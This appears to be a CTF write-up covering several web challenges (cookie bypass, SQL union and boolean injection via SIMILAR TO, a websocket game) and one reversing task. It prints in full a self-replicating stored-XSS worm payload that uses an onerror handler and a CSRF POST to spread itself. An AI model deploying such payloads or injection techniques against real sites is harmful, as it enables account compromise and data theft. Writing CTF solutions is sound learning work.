Open
Open to any detailed questions, please DM me on Discord or down below.
web/flaglang
The code strictly limits the acquisition to flag only when the request cookie contains the specific password same as the randomly generated one, which would normally be impossible to guess. Yet we can simply bypass this limitation by removing the cookie.
1 | GET /view?country=Flagistan |
web/la housing portal
All arguments at /submit
API, except for name
, are collected and used in constructing a SQL query statement, which is vulnerable to SQL injection, and comment symbols are filtered out.
My strategy is to remove all arguments but guests
and conduct a union injection to retrieve the flag.
1 | POST /submit |
web/new-housing-portal
Core Concepts: XSS + CSRF
Technique: Bypassing innerHTML with event handlers + code worm self-replication
The username field is vulnerable to stored XSS attacks. Since the username is fetched via Ajax and then inserted into the page using innerHTML, directly inserting a script tag won’t automatically execute (because window.load has already finished executing). However, event handlers can be used.
Therefore, the payload is slightly more complex, utilizing the onerror event to execute the contents of a script tag. Then, the script tag contains a worm-like self-replicating code, necessary because the entire payload needs to be included as the value of a request parameter in the constructed CSRF request.
Final payload:
1 | <img src=1 onerror=eval(document.getElementById('worm').innerHTML)><script id=worm>var headerTag="<script id=worm>"; var jsCode = document.getElementById("worm").innerHTML; var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); var xhr = new XMLHttpRequest(); xhr.open("POST", "https://new-housing-portal.chall.lac.tf/finder"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("username="+"<img src=1 onerror=eval(document.getElementById('worm').innerHTML)>"+wormCode); </script> |
web/pogn
Simply create a Websocket connection through Burp Suite, and wait until the ball hits outside of the boundary.
web/penguin-login
There is a SQL injection vulnerability with a more strict filter which bans all special characters except { _ }'
. The filter also bans the LIKE
expression.
The SQL injection vulnerability can only be exploited by error-based injection and boolean injection. The former seems impossible to my best knowledge, and we can use the SIMILAR TO
expression as an alternative to LIKE
for conducting boolean injection.
SIMILAR TO
expression provides the _
pattern the same as .
in POSIX regular expressions.
We can leverage _
to guess the real length of the flag, then craft a script to brute force it out.
The script:
1 | import requests |
One thing remaining to consider is that any number followed by {
in the SIMILAR TO
expression would trigger an invalid repetition counts error
, due to {
having its special meaning as its a regular pattern too, and any number at this position would throw an error.
So we have to finalize this flag element by a normal query API.
The real element is indeed a number 9.
rev/aplet321
Reverse engineer the binary, and craft the script by reversing the logics.
Script:
1 | # Calculate the occurrences of "please" and "pretty" |